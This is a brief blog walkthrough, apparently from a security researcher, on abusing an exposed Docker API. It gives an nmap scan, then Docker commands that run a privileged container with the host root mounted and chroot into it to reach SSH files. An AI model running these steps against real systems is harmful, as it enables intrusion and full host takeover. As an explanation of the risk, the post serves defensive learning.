Docker API Abuse

2 min readOct 6, 2021


The docker API basically is an interface between docker daemon and docker image. The docker API is exposed via a Unix Socket at /var/run/docker.sock by default.The Docker daemon(server) uses this socket to listen to the API and the clients(docker images) use the socket to send API requests to the daemon. The image below shows the basic docker architecture:

Basic Docker architecture

When the docker API is accessed over TCP connection through docker ports like 2375,2376 and 2377, the docker client can access(or remote access) the docker daemon, which is running outside the host. In this blog we will see why exposing the docker API on the internet is a tremendous risk.

1.We start with a simple nmap scan to discover opened docker ports.Command: nmap -p2375,2376,2377

nmap scan result — Opened swarm port

2.As we can see in the above image, we found machine( having swarm port already opened. Checking our own ip.

Our IP:

3.Now we will run a misconfigured docker image from our machine (remotely) into the target machine( The command:

docker -H run -it — privileged — net host -v /:/host ubuntu /bin/bash

running docker container remotely

4.Moreover, if we run the above docker command making chroot inside container, we get the access to ssh folder wherein we can manipulate the ssh files.The command:

docker -H run -it — privileged — net host -v /:/host ubuntu chroot /host bash

ssh files access with chroot

Have fun!




Linux Security<Malware> Researcher